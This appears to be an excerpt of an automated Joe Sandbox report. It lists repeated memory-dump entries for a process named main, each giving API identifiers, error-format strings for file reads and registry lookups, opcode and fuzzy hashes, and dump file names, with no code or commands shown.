                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: baac9c1114a98bed6eae314587cd68cb6fb42297a9dc9bc8ec8630a526df8742
                                    • Instruction ID: b51046235e59f39a8a5d9966367ab339c36a50904b4f04dbb66a8eb97c82f662
                                    • Opcode Fuzzy Hash: baac9c1114a98bed6eae314587cd68cb6fb42297a9dc9bc8ec8630a526df8742
                                    • Instruction Fuzzy Hash: D1F03023A0B106C2F963AA04B4417B995521F55378E8B0AB5CD490A6F1AE3EA8878320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: e46899573921c1e84c6f510f508363e14cb84ebdf7ad9e79a4d83c456136e3d4
                                    • Instruction ID: 54bd699ae22562beec09e08ef17eb5b5a256da3638fa963e94642d4215f613aa
                                    • Opcode Fuzzy Hash: e46899573921c1e84c6f510f508363e14cb84ebdf7ad9e79a4d83c456136e3d4
                                    • Instruction Fuzzy Hash: 51F03023A0B106C2F963AA04B4417B995521F55378E8B0AB58D490A6F1AE3EA8878320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: b4472d493916910336c3a184dc5fe2b6a72edf1b18ce426c0d0c23c479426e80
                                    • Instruction ID: c0a2e7e7b9d2896269db39d0b3f7c6517c3bc0fcd08a69a2047652da24dbc3c2
                                    • Opcode Fuzzy Hash: b4472d493916910336c3a184dc5fe2b6a72edf1b18ce426c0d0c23c479426e80
                                    • Instruction Fuzzy Hash: EEF05433B0B107C2F963BB04B4417B995521F55378E8B0AB5CD490E6F1AE3EA8C78320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: c0d6bb7511871c5a68bf8da3c77fa9bd4f52e7e41db3f0cbe9c9b3ce7f7b5488
                                    • Instruction ID: 8178701e6d9253ff1fe19a5c0c6e6ecc8626564d6204742c20cc561b481b1eb5
                                    • Opcode Fuzzy Hash: c0d6bb7511871c5a68bf8da3c77fa9bd4f52e7e41db3f0cbe9c9b3ce7f7b5488
                                    • Instruction Fuzzy Hash: 2EF068E271C6CA41F5539B20FC403B56154AF46794F44023ADD5D866B0DFBDDE859301
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: a055b4778c3783c3e4fa707d1fe53f1d983445d5da2b89f4e01d61ab3e764a99
                                    • Instruction ID: c2a8bdf814aec4046f6c56901b2820640b4de64dcbff649172d882f2cae28687
                                    • Opcode Fuzzy Hash: a055b4778c3783c3e4fa707d1fe53f1d983445d5da2b89f4e01d61ab3e764a99
                                    • Instruction Fuzzy Hash: 94F068E271C6CA42F5539B20FC403B56154AF46794F44023ADD5DC66B0DFBDDD859301
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: fd9f8888c0c0265d1dad1df399124e1029d37ca8bf3deb28ef4ddfae8a1056fc
                                    • Instruction ID: fb8ac543755b90330e0209250c60278e51b730203016914ce76c42db23ba2b46
                                    • Opcode Fuzzy Hash: fd9f8888c0c0265d1dad1df399124e1029d37ca8bf3deb28ef4ddfae8a1056fc
                                    • Instruction Fuzzy Hash: 58F0C8E270C2CA41F5538B20FC403B56154AF46794F440239DD1D862B0EFBDDD859301
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: c3dff2d061f3e5c9a2bcf6a40d8b53005d9f3c8c448c43403f9d6371be0e5e12
                                    • Instruction ID: 8491c1ef8f177845cfc45918ed46f4f565fad1ea3ccab93b713a0fd66e7d7fc0
                                    • Opcode Fuzzy Hash: c3dff2d061f3e5c9a2bcf6a40d8b53005d9f3c8c448c43403f9d6371be0e5e12
                                    • Instruction Fuzzy Hash: A6F068E271C6CA41F5535B20FC403B56154AF46794F440239DD5D865B0DFBDDD899301
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: c35669941a7ba86aad468810fa48f2004c76b28f74cf3b2dc9b98ab190aaf282
                                    • Instruction ID: fab0da83c4cc6a0837ac0efdfb7fae7c056d01382b0d71d1d96e0de87cd8f5d3
                                    • Opcode Fuzzy Hash: c35669941a7ba86aad468810fa48f2004c76b28f74cf3b2dc9b98ab190aaf282
                                    • Instruction Fuzzy Hash: 6EF068E271C6C641F5539B20FC403B56154AF46794F480239DD5D866B0DFBDDD899301
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: dc1d72c241cb2a582c13a8c20989dd97c94f2eaf65a9d9d8e4de6004fbc356e4
                                    • Instruction ID: fa542073484c319243c50f6a69ce24b5386ec0a8c757811941bf12ced51a1178
                                    • Opcode Fuzzy Hash: dc1d72c241cb2a582c13a8c20989dd97c94f2eaf65a9d9d8e4de6004fbc356e4
                                    • Instruction Fuzzy Hash: 80F0C892E0C68681F6538F20FD413B52154BF46794F080135DD5DCA6A0DFADED89D300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 2f734235ef33e1cf216b788ab3af8fc11556682c22bf506bbb09f642fc0cdf2f
                                    • Instruction ID: ffb08266d48e2e4b950e6f4666e8b7448528af75cff74a54c5a1e4c370842222
                                    • Opcode Fuzzy Hash: 2f734235ef33e1cf216b788ab3af8fc11556682c22bf506bbb09f642fc0cdf2f
                                    • Instruction Fuzzy Hash: 96F0C892E0C68681F5538F20FD413B52154AF46794F440135DD1DCA2A0DFADED49C300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 72fe1bc1b32591d8f70d9e24a5057d4d92522e8cce16a11d7cf9252054e77442
                                    • Instruction ID: 273d77940615a1e82fa770e0efd1f7de3ea4bb143885727a1952e3d6d790b721
                                    • Opcode Fuzzy Hash: 72fe1bc1b32591d8f70d9e24a5057d4d92522e8cce16a11d7cf9252054e77442
                                    • Instruction Fuzzy Hash: 2CF0C892E0C68682F5538F20FD413B56154AF46794F440135DD1DCA6A0DFADED49C300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: f7e974a224ffc65d7a54241aaec555cb8d64a378b09abe69ed44a2d7e3ed881f
                                    • Instruction ID: 2e9d24627d5a95d04f32d8e57fd3566e9161861e2ee79f36723b7ffe2a56c9e1
                                    • Opcode Fuzzy Hash: f7e974a224ffc65d7a54241aaec555cb8d64a378b09abe69ed44a2d7e3ed881f
                                    • Instruction Fuzzy Hash: B9F0C892E0C68681F5538F20FD413B52154AF46795F440135DD1DCA2A1EFADED49C300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 0aa8db09fb7bc194bfe922522c43b0ee662879c6bd362265d23314251f3a506b
                                    • Instruction ID: ecbd25a366671243d9f9607521306dbf0e546827534710a4a49635a1f613f177
                                    • Opcode Fuzzy Hash: 0aa8db09fb7bc194bfe922522c43b0ee662879c6bd362265d23314251f3a506b
                                    • Instruction Fuzzy Hash: 1FF0C892E0C68681F5538F20FD413B52154BF46794F440135DD1DCA2A0DFADED49C300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 9a2de95ffd5d781e6813de5ef751d9da9c96fa48fc425b1bbe8cd7e8830a080e
                                    • Instruction ID: fa799de564ea5a7d3e264217689a6fca2cd97336d468a3a0670d0b24a4862248
                                    • Opcode Fuzzy Hash: 9a2de95ffd5d781e6813de5ef751d9da9c96fa48fc425b1bbe8cd7e8830a080e
                                    • Instruction Fuzzy Hash: 95F0F6A270838A42E5538F20FC403BD3265BF567A4F0C037AED5D566A5EF2DDD898300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 9c0b5fabe127716bf8518f75c5551f6d0a8f072a3ba3e7517ce0fd91c10b36ff
                                    • Instruction ID: 78add615347c9082d6e157b51bc109ac50ee64a0b2fe886c8867ebecb58c5413
                                    • Opcode Fuzzy Hash: 9c0b5fabe127716bf8518f75c5551f6d0a8f072a3ba3e7517ce0fd91c10b36ff
                                    • Instruction Fuzzy Hash: 3DF0F6A270828A42E5538F20FC403BD7265BF567A4F0C027AED1DA66A5EF2DDD458700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: ca6dd569a177849d8c2a45a9408bc3dfce42c36ed4bcb66d60c5af44c99c8d6a
                                    • Instruction ID: f0f1e8eae3843e3b76722991e093c804c8510e52fdf3b1df78c4d35cc33a264d
                                    • Opcode Fuzzy Hash: ca6dd569a177849d8c2a45a9408bc3dfce42c36ed4bcb66d60c5af44c99c8d6a
                                    • Instruction Fuzzy Hash: 54F0F6A270828A42E5538F20FC403BD3265BF567A4F0C027AED1D662A5EF2DDE458300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 864bd6950e4dc7ead035f6458e2f111194ad25b06bbe2de8fa939e0b9dfb6e44
                                    • Instruction ID: 62d1ebb02e77a0697f5662aa9421b33f6b44b1ac79ae0d90b6d26d7efa2604be
                                    • Opcode Fuzzy Hash: 864bd6950e4dc7ead035f6458e2f111194ad25b06bbe2de8fa939e0b9dfb6e44
                                    • Instruction Fuzzy Hash: 3CF0F6A270828A42E5538F20FC403BD3265BF567A4F0C027AED1D662E5EF2DD9498300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 3d58607ea008f735c35aa192c444d383010a86a802efbfec2a893f784aca3acb
                                    • Instruction ID: 9b16a3d32d18a3ddf47429bd2b3b80279fbb6e88bdb4f7c21954e0fea0fc56d2
                                    • Opcode Fuzzy Hash: 3d58607ea008f735c35aa192c444d383010a86a802efbfec2a893f784aca3acb
                                    • Instruction Fuzzy Hash: 94F0F6A270838A42E5538F20FC403BD3265BF567A5F0C037AED1D662A5EF2DDD458300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: 793e0c06394bda39ac92b5b5c5c85dbcebae374f34c8edb7e19317ab693b0827
                                    • Instruction ID: a8b092058e6706f44141431876f4562d872c1b997600ee47bc489bcf21cb40ba
                                    • Opcode Fuzzy Hash: 793e0c06394bda39ac92b5b5c5c85dbcebae374f34c8edb7e19317ab693b0827
                                    • Instruction Fuzzy Hash: 2AF062AAA0978645E5539F20FCC837D7254BF847A4F4C02BADDCD566E0DF2ED9899300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
